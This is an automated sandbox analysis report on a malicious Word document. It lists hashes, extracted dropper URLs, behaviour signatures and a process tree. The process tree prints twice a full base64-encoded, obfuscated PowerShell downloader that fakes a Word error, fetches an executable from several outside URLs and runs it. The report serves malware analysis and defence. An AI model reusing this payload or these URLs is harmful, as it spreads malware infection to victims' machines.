Analysis

  • max time kernel
    139s
  • max time network
    135s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    13-01-2021 11:05

General

  • Target

    Account_30_12_2020.doc

  • Size

    156KB

  • MD5

    97213d62042927ecab4a2608b38a37af

  • SHA1

    d4c68b37c5729d94699e00e8fc1edf97a18ba599

  • SHA256

    9d1c6b80623e5e370ed018b95870675936022c4a9bf0ddc1378db520b304309e

  • SHA512

    4e89d7541e38a797c279f8e271adb06ba54a2764d29a8b4e33b93bb79bee74f1affa147ac3dfd9cd4e6330290dda64cac1b99a7f7fd4b3bc0e5c14cc4d6196f6

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://www.mypostletter.com/wp-admin/G3/

exe.dropper

http://www.trueapparels.com/a/4k/

exe.dropper

http://iut-bethune.univ-artois.fr/benefits-of-hhnzoet/T/

exe.dropper

http://www.xportfreight.com/wp-content/c/

exe.dropper

http://talentvalue.com/wp-admin/DEoUM/

exe.dropper

https://skyeconsultoria.com.br/wp-admin/co/

exe.dropper

https://atprofessional.org/wp-content/O6Vey/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Account_30_12_2020.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:640
  • C:\Windows\system32\cmd.exe
    cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAkAEcAYQBtAHYAIAAgAD0AIAAgAFsAVABZAFAAZQBdACgAIgB7ADEAfQB7ADMAfQB7ADQAfQB7ADAAfQB7ADIAfQB7ADUAfQAiACAALQBmACAAJwBEAEkAJwAsACcAUwAnACwAJwBSAEUAYwBUACcALAAnAHkAUwB0AEUAbQAuAEkATwAnACwAJwAuACcALAAnAE8AcgB5ACcAKQA7ACQAMgBPAE4AIAA9ACAAIABbAFQAWQBQAEUAXQAoACIAewAzAH0AewA3AH0AewAyAH0AewA2AH0AewA1AH0AewAwAH0AewA0AH0AewAxAH0AIgAgAC0AZgAgACcATQBBAG4AQQAnACwAJwByACcALAAnAFQALgAnACwAJwBzAFkAcwBUAGUAbQAnACwAJwBnAEUAJwAsACcAYwBFAFAATwBpAE4AdAAnACwAJwBzAGUAcgBWAGkAJwAsACcALgBOAGUAJwApACAAIAA7ACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACgAKAAnAFMAJwArACcAaQBsACcAKQArACgAJwBlACcAKwAnAG4AdAAnACkAKwAnAGwAeQAnACsAKAAnAEMAbwAnACsAJwBuAHQAaQBuAHUAZQAnACkAKQA7ACQASgB6ADMAZwB5AGUAdwA9ACQAWgAxADgAUwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUwAxADcAVgA7ACQAQwA4ADMAVAA9ACgAJwBFADEAJwArACcAMwBVACcAKQA7ACAAKAAgAGcASQAgAHYAQQByAGkAQQBCAGwARQA6AEcAQQBNAHYAIAApAC4AVgBhAGwAdQBlADoAOgAiAEMAUgBgAEUAYQB0AEUARABJAFIAZQBjAGAAVABvAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9ACcAKwAoACcATQAnACsAJwBnAGYAJwApACsAJwA4ADcAJwArACcAYwBoAHsAMAB9AEwAJwArACgAJwBkACcAKwAnADEAdgAyAF8AJwApACsAJwBtAHsAJwArACcAMAB9ACcAKQAtAGYAIAAgAFsAQwBoAGEAcgBdADkAMgApACkAOwAkAFMANgBfAFkAPQAoACcASwAnACsAKAAnADcAMwAnACsAJwBJACcAKQApADsAIAAoACAARwBFAHQALQB2AGEAcgBpAEEAQgBsAEUAIAAgACgAJwAyAE8AJwArACcAbgAnACkAIAAgAC0AVgBhAGwAIAAgACkAOgA6ACIAUwBgAEUAYwB1AFIAYABJAHQAeQBwAGAAUgBvAGAAVABPAGMATwBsACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABSADUANQBCAD0AKAAnAFAANgAnACsAJwAwAEkAJwApADsAJABBAHkAZgBjAG4AYgA5ACAAPQAgACgAKAAnAEMAJwArACcANgAyACcAKQArACcAQQAnACkAOwAkAE8ANgA4AEwAPQAoACcATwAnACsAKAAnADcAJwArACcAMwBRACcAKQApADsAJABIAHkAbABrADYANwBvAD0AJABIAE8ATQBFACsAKAAoACcAMgAnACsAKAAnAEgAdgAnACsAJwBNACcAKQArACcAZwBmACcAKwAnADgAJwArACgAJwA3ACcAKwAnAGMAaAAyAEgAdgBMAGQAMQB2ACcAKwAnADIAXwAnACsAJwBtACcAKwAnADIASAAnACkAKwAnAHYAJwApAC4AIgByAGAARQBgAHAAbABBAGMAZQAiACgAKABbAGMASABBAHIAXQA1ADAAKwBbAGMASABBAHIAXQA3ADIAKwBbAGMASABBAHIAXQAxADEAOAApACwAJwBcACcAKQApACsAJABBAHkAZgBjAG4AYgA5ACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQATQAyADgASAA9ACgAJwBDACcAKwAoACcAOQAnACsAJwA0AE0AJwApACkAOwAkAE8AbgA4AHkAbgA5ADMAPQAoACgAJwBdAGUAJwArACcAMQAnACkAKwAoACcAcgAnACsAJwBbAFMAOgAvACcAKwAnAC8AdwAnACkAKwAoACcAdwB3AC4AbQB5AHAAJwArACcAbwAnACkAKwAnAHMAJwArACgAJwB0ACcAKwAnAGwAZQB0AHQAZQAnACsAJwByAC4AYwBvAG0ALwAnACkAKwAoACcAdwAnACsAJwBwAC0AJwApACsAKAAnAGEAZABtACcAKwAnAGkAbgAvACcAKQArACgAJwBHACcAKwAnADMALwAnACkAKwAnAEAAXQAnACsAJwBlACcAKwAoACcAMQAnACsAJwByAFsAJwApACsAJwBTACcAKwAoACcAOgAvAC8AJwArACcAdwAnACkAKwAoACcAdwB3AC4AJwArACcAdAByACcAKQArACgAJwB1AGUAYQAnACsAJwBwACcAKQArACgAJwBwACcAKwAnAGEAcgAnACkAKwAoACcAZQAnACsAJwBsAHMAJwApACsAJwAuACcAKwAoACcAYwBvACcAKwAnAG0AJwApACsAJwAvACcAKwAnAGEAJwArACcALwAnACsAKAAnADQAawAnACsAJwAvACcAKQArACcAQAAnACsAKAAnAF0AZQAxAHIAJwArACcAWwBTADoAJwApACsAKAAnAC8AJwArACcALwBpACcAKQArACgAJwB1ACcAKwAnAHQALQBiACcAKQArACgAJwBlAHQAJwArACcAaAAnACkAKwAnAHUAbgAnACsAKAAnAGUAJwArACcALgB1AG4AaQAnACsAJwB2AC0AYQAnACkAKwAnAHIAdAAnACsAKAAnAG8AaQAnACsAJwBzAC4AZgAnACkAKwAoACcAcgAvAGIAZQAnACsAJwBuAGUAZgAnACkAKwAoACcAaQB0AHMAJwArACcALQBvAGYALQAnACkAKwAnAGgAaAAnACsAJwBuAHoAJwArACgAJwBvACcAKwAnAGUAdAAnACkAKwAoACcALwBUACcAKwAnAC8AQAAnACkAKwAnAF0AZQAnACsAKAAnADEAJwArACcAcgBbAFMAJwApACsAJwA6ACcAKwAnAC8ALwAnACsAJwB3ACcAKwAoACcAdwAnACsAJwB3AC4AeAAnACsAJwBwAG8AcgB0ACcAKwAnAGYAcgBlAGkAJwApACsAJwBnAGgAJwArACcAdAAuACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlAG4AdAAnACsAJwAvAGMAJwApACsAKAAnAC8AQAAnACsAJwBdACcAKQArACgAJwBlADEAJwArACcAcgBbACcAKQArACcAUwAnACsAKAAnADoALwAnACsAJwAvACcAKQArACgAJwB0AGEAbAAnACsAJwBlACcAKQArACgAJwBuACcAKwAnAHQAdgAnACkAKwAnAGEAbAAnACsAKAAnAHUAJwArACcAZQAuAGMAbwBtAC8AJwApACsAJwB3AHAAJwArACcALQBhACcAKwAnAGQAJwArACcAbQBpACcAKwAoACcAbgAnACsAJwAvAEQARQBvAFUAJwApACsAJwBNAC8AJwArACgAJwBAAF0AZQAnACsAJwAxAHIAJwApACsAKAAnAFsAJwArACcAUwBzADoALwAvACcAKQArACgAJwBzAGsAJwArACcAeQBlAGMAJwApACsAJwBvAG4AJwArACgAJwBzACcAKwAnAHUAbAB0AG8AJwApACsAKAAnAHIAaQAnACsAJwBhAC4AYwBvAG0ALgAnACsAJwBiACcAKQArACgAJwByAC8AdwBwAC0AJwArACcAYQBkACcAKwAnAG0AJwApACsAJwBpAG4AJwArACcALwBjACcAKwAoACcAbwAnACsAJwAvAEAAJwApACsAKAAnAF0AZQAnACsAJwAxACcAKQArACcAcgBbACcAKwAnAFMAJwArACcAcwA6ACcAKwAoACcALwAnACsAJwAvAGEAJwApACsAJwB0AHAAJwArACcAcgBvACcAKwAoACcAZgBlACcAKwAnAHMAcwBpACcAKQArACcAbwBuACcAKwAoACcAYQBsACcAKwAnAC4AbwAnACkAKwAoACcAcgAnACsAJwBnAC8AJwArACcAdwBwAC0AYwBvAG4AdAAnACkAKwAnAGUAJwArACgAJwBuACcAKwAnAHQALwAnACkAKwAnAE8ANgAnACsAJwBWACcAKwAoACcAZQB5ACcAKwAnAC8AJwApACkALgAiAFIARQBwAGwAYABBAGAAYwBFACIAKAAoACcAXQBlACcAKwAoACcAMQAnACsAJwByAFsAUwAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACgAJwBoACcAKwAnAHQAdAAnACkAKwAnAHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAYABQAEwAaQB0ACIAKAAkAFMANAAyAE8AIAArACAAJABKAHoAMwBnAHkAZQB3ACAAKwAgACQAUwAyADAAQgApADsAJABFADUAXwBaAD0AKAAnAFgAJwArACgAJwBfADAAJwArACcAVQAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUgAyAGsAcQBuADAAMAAgAGkAbgAgACQATwBuADgAeQBuADkAMwApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0ATwAnACsAJwBiAGoAJwArACcAZQBjAHQAJwApACAAUwB5AFMAVABlAG0ALgBOAEUAdAAuAFcARQBCAEMATABpAGUATgB0ACkALgAiAGQAYABPAHcATgBMAG8AQQBgAGQARgBpAGAATABlACIAKAAkAFIAMgBrAHEAbgAwADAALAAgACQASAB5AGwAawA2ADcAbwApADsAJABEADMAOABDAD0AKAAnAE0AOQAnACsAJwA3AFkAJwApADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAEgAeQBsAGsANgA3AG8AKQAuACIAbABlAGAATgBgAEcAdABoACIAIAAtAGcAZQAgADQAMwA3ADAANQApACAAewAmACgAJwByAHUAbgAnACsAJwBkAGwAbAAnACsAJwAzADIAJwApACAAJABIAHkAbABrADYANwBvACwAKAAnAEMAJwArACgAJwBvAG4AJwArACcAdAAnACkAKwAoACcAcgBvACcAKwAnAGwAJwApACsAKAAnAF8AUgB1AG4ARAAnACsAJwBMACcAKwAnAEwAJwApACkALgAiAFQATwBgAHMAYABUAHIAaQBOAEcAIgAoACkAOwAkAEcANwAwAEgAPQAoACcASwAnACsAKAAnADIAJwArACcANABWACcAKQApADsAYgByAGUAYQBrADsAJABSADIAMQBVAD0AKAAnAEUAOAAnACsAJwA1AE0AJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABZADYAOABBAD0AKAAnAE8AJwArACgAJwAxACcAKwAnADAAUAAnACkAKQA=
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2996
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:648
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwersheLL -w hidden -ENCOD IAAkAEcAYQBtAHYAIAAgAD0AIAAgAFsAVABZAFAAZQBdACgAIgB7ADEAfQB7ADMAfQB7ADQAfQB7ADAAfQB7ADIAfQB7ADUAfQAiACAALQBmACAAJwBEAEkAJwAsACcAUwAnACwAJwBSAEUAYwBUACcALAAnAHkAUwB0AEUAbQAuAEkATwAnACwAJwAuACcALAAnAE8AcgB5ACcAKQA7ACQAMgBPAE4AIAA9ACAAIABbAFQAWQBQAEUAXQAoACIAewAzAH0AewA3AH0AewAyAH0AewA2AH0AewA1AH0AewAwAH0AewA0AH0AewAxAH0AIgAgAC0AZgAgACcATQBBAG4AQQAnACwAJwByACcALAAnAFQALgAnACwAJwBzAFkAcwBUAGUAbQAnACwAJwBnAEUAJwAsACcAYwBFAFAATwBpAE4AdAAnACwAJwBzAGUAcgBWAGkAJwAsACcALgBOAGUAJwApACAAIAA7ACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACgAKAAnAFMAJwArACcAaQBsACcAKQArACgAJwBlACcAKwAnAG4AdAAnACkAKwAnAGwAeQAnACsAKAAnAEMAbwAnACsAJwBuAHQAaQBuAHUAZQAnACkAKQA7ACQASgB6ADMAZwB5AGUAdwA9ACQAWgAxADgAUwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUwAxADcAVgA7ACQAQwA4ADMAVAA9ACgAJwBFADEAJwArACcAMwBVACcAKQA7ACAAKAAgAGcASQAgAHYAQQByAGkAQQBCAGwARQA6AEcAQQBNAHYAIAApAC4AVgBhAGwAdQBlADoAOgAiAEMAUgBgAEUAYQB0AEUARABJAFIAZQBjAGAAVABvAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9ACcAKwAoACcATQAnACsAJwBnAGYAJwApACsAJwA4ADcAJwArACcAYwBoAHsAMAB9AEwAJwArACgAJwBkACcAKwAnADEAdgAyAF8AJwApACsAJwBtAHsAJwArACcAMAB9ACcAKQAtAGYAIAAgAFsAQwBoAGEAcgBdADkAMgApACkAOwAkAFMANgBfAFkAPQAoACcASwAnACsAKAAnADcAMwAnACsAJwBJACcAKQApADsAIAAoACAARwBFAHQALQB2AGEAcgBpAEEAQgBsAEUAIAAgACgAJwAyAE8AJwArACcAbgAnACkAIAAgAC0AVgBhAGwAIAAgACkAOgA6ACIAUwBgAEUAYwB1AFIAYABJAHQAeQBwAGAAUgBvAGAAVABPAGMATwBsACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABSADUANQBCAD0AKAAnAFAANgAnACsAJwAwAEkAJwApADsAJABBAHkAZgBjAG4AYgA5ACAAPQAgACgAKAAnAEMAJwArACcANgAyACcAKQArACcAQQAnACkAOwAkAE8ANgA4AEwAPQAoACcATwAnACsAKAAnADcAJwArACcAMwBRACcAKQApADsAJABIAHkAbABrADYANwBvAD0AJABIAE8ATQBFACsAKAAoACcAMgAnACsAKAAnAEgAdgAnACsAJwBNACcAKQArACcAZwBmACcAKwAnADgAJwArACgAJwA3ACcAKwAnAGMAaAAyAEgAdgBMAGQAMQB2ACcAKwAnADIAXwAnACsAJwBtACcAKwAnADIASAAnACkAKwAnAHYAJwApAC4AIgByAGAARQBgAHAAbABBAGMAZQAiACgAKABbAGMASABBAHIAXQA1ADAAKwBbAGMASABBAHIAXQA3ADIAKwBbAGMASABBAHIAXQAxADEAOAApACwAJwBcACcAKQApACsAJABBAHkAZgBjAG4AYgA5ACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQATQAyADgASAA9ACgAJwBDACcAKwAoACcAOQAnACsAJwA0AE0AJwApACkAOwAkAE8AbgA4AHkAbgA5ADMAPQAoACgAJwBdAGUAJwArACcAMQAnACkAKwAoACcAcgAnACsAJwBbAFMAOgAvACcAKwAnAC8AdwAnACkAKwAoACcAdwB3AC4AbQB5AHAAJwArACcAbwAnACkAKwAnAHMAJwArACgAJwB0ACcAKwAnAGwAZQB0AHQAZQAnACsAJwByAC4AYwBvAG0ALwAnACkAKwAoACcAdwAnACsAJwBwAC0AJwApACsAKAAnAGEAZABtACcAKwAnAGkAbgAvACcAKQArACgAJwBHACcAKwAnADMALwAnACkAKwAnAEAAXQAnACsAJwBlACcAKwAoACcAMQAnACsAJwByAFsAJwApACsAJwBTACcAKwAoACcAOgAvAC8AJwArACcAdwAnACkAKwAoACcAdwB3AC4AJwArACcAdAByACcAKQArACgAJwB1AGUAYQAnACsAJwBwACcAKQArACgAJwBwACcAKwAnAGEAcgAnACkAKwAoACcAZQAnACsAJwBsAHMAJwApACsAJwAuACcAKwAoACcAYwBvACcAKwAnAG0AJwApACsAJwAvACcAKwAnAGEAJwArACcALwAnACsAKAAnADQAawAnACsAJwAvACcAKQArACcAQAAnACsAKAAnAF0AZQAxAHIAJwArACcAWwBTADoAJwApACsAKAAnAC8AJwArACcALwBpACcAKQArACgAJwB1ACcAKwAnAHQALQBiACcAKQArACgAJwBlAHQAJwArACcAaAAnACkAKwAnAHUAbgAnACsAKAAnAGUAJwArACcALgB1AG4AaQAnACsAJwB2AC0AYQAnACkAKwAnAHIAdAAnACsAKAAnAG8AaQAnACsAJwBzAC4AZgAnACkAKwAoACcAcgAvAGIAZQAnACsAJwBuAGUAZgAnACkAKwAoACcAaQB0AHMAJwArACcALQBvAGYALQAnACkAKwAnAGgAaAAnACsAJwBuAHoAJwArACgAJwBvACcAKwAnAGUAdAAnACkAKwAoACcALwBUACcAKwAnAC8AQAAnACkAKwAnAF0AZQAnACsAKAAnADEAJwArACcAcgBbAFMAJwApACsAJwA6ACcAKwAnAC8ALwAnACsAJwB3ACcAKwAoACcAdwAnACsAJwB3AC4AeAAnACsAJwBwAG8AcgB0ACcAKwAnAGYAcgBlAGkAJwApACsAJwBnAGgAJwArACcAdAAuACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlAG4AdAAnACsAJwAvAGMAJwApACsAKAAnAC8AQAAnACsAJwBdACcAKQArACgAJwBlADEAJwArACcAcgBbACcAKQArACcAUwAnACsAKAAnADoALwAnACsAJwAvACcAKQArACgAJwB0AGEAbAAnACsAJwBlACcAKQArACgAJwBuACcAKwAnAHQAdgAnACkAKwAnAGEAbAAnACsAKAAnAHUAJwArACcAZQAuAGMAbwBtAC8AJwApACsAJwB3AHAAJwArACcALQBhACcAKwAnAGQAJwArACcAbQBpACcAKwAoACcAbgAnACsAJwAvAEQARQBvAFUAJwApACsAJwBNAC8AJwArACgAJwBAAF0AZQAnACsAJwAxAHIAJwApACsAKAAnAFsAJwArACcAUwBzADoALwAvACcAKQArACgAJwBzAGsAJwArACcAeQBlAGMAJwApACsAJwBvAG4AJwArACgAJwBzACcAKwAnAHUAbAB0AG8AJwApACsAKAAnAHIAaQAnACsAJwBhAC4AYwBvAG0ALgAnACsAJwBiACcAKQArACgAJwByAC8AdwBwAC0AJwArACcAYQBkACcAKwAnAG0AJwApACsAJwBpAG4AJwArACcALwBjACcAKwAoACcAbwAnACsAJwAvAEAAJwApACsAKAAnAF0AZQAnACsAJwAxACcAKQArACcAcgBbACcAKwAnAFMAJwArACcAcwA6ACcAKwAoACcALwAnACsAJwAvAGEAJwApACsAJwB0AHAAJwArACcAcgBvACcAKwAoACcAZgBlACcAKwAnAHMAcwBpACcAKQArACcAbwBuACcAKwAoACcAYQBsACcAKwAnAC4AbwAnACkAKwAoACcAcgAnACsAJwBnAC8AJwArACcAdwBwAC0AYwBvAG4AdAAnACkAKwAnAGUAJwArACgAJwBuACcAKwAnAHQALwAnACkAKwAnAE8ANgAnACsAJwBWACcAKwAoACcAZQB5ACcAKwAnAC8AJwApACkALgAiAFIARQBwAGwAYABBAGAAYwBFACIAKAAoACcAXQBlACcAKwAoACcAMQAnACsAJwByAFsAUwAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACgAJwBoACcAKwAnAHQAdAAnACkAKwAnAHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAYABQAEwAaQB0ACIAKAAkAFMANAAyAE8AIAArACAAJABKAHoAMwBnAHkAZQB3ACAAKwAgACQAUwAyADAAQgApADsAJABFADUAXwBaAD0AKAAnAFgAJwArACgAJwBfADAAJwArACcAVQAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUgAyAGsAcQBuADAAMAAgAGkAbgAgACQATwBuADgAeQBuADkAMwApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0ATwAnACsAJwBiAGoAJwArACcAZQBjAHQAJwApACAAUwB5AFMAVABlAG0ALgBOAEUAdAAuAFcARQBCAEMATABpAGUATgB0ACkALgAiAGQAYABPAHcATgBMAG8AQQBgAGQARgBpAGAATABlACIAKAAkAFIAMgBrAHEAbgAwADAALAAgACQASAB5AGwAawA2ADcAbwApADsAJABEADMAOABDAD0AKAAnAE0AOQAnACsAJwA3AFkAJwApADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAEgAeQBsAGsANgA3AG8AKQAuACIAbABlAGAATgBgAEcAdABoACIAIAAtAGcAZQAgADQAMwA3ADAANQApACAAewAmACgAJwByAHUAbgAnACsAJwBkAGwAbAAnACsAJwAzADIAJwApACAAJABIAHkAbABrADYANwBvACwAKAAnAEMAJwArACgAJwBvAG4AJwArACcAdAAnACkAKwAoACcAcgBvACcAKwAnAGwAJwApACsAKAAnAF8AUgB1AG4ARAAnACsAJwBMACcAKwAnAEwAJwApACkALgAiAFQATwBgAHMAYABUAHIAaQBOAEcAIgAoACkAOwAkAEcANwAwAEgAPQAoACcASwAnACsAKAAnADIAJwArACcANABWACcAKQApADsAYgByAGUAYQBrADsAJABSADIAMQBVAD0AKAAnAEUAOAAnACsAJwA1AE0AJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABZADYAOABBAD0AKAAnAE8AJwArACgAJwAxACcAKwAnADAAUAAnACkAKQA=
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3680

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/640-2-0x00007FFC30520000-0x00007FFC30B57000-memory.dmp
      Filesize

      6.2MB

    • memory/648-3-0x0000000000000000-mapping.dmp
    • memory/3680-4-0x0000000000000000-mapping.dmp
    • memory/3680-5-0x00007FFC29BC0000-0x00007FFC2A5AC000-memory.dmp
      Filesize

      9.9MB

    • memory/3680-6-0x000001FFEE400000-0x000001FFEE401000-memory.dmp
      Filesize

      4KB

    • memory/3680-7-0x000001FFEE7F0000-0x000001FFEE7F1000-memory.dmp
      Filesize

      4KB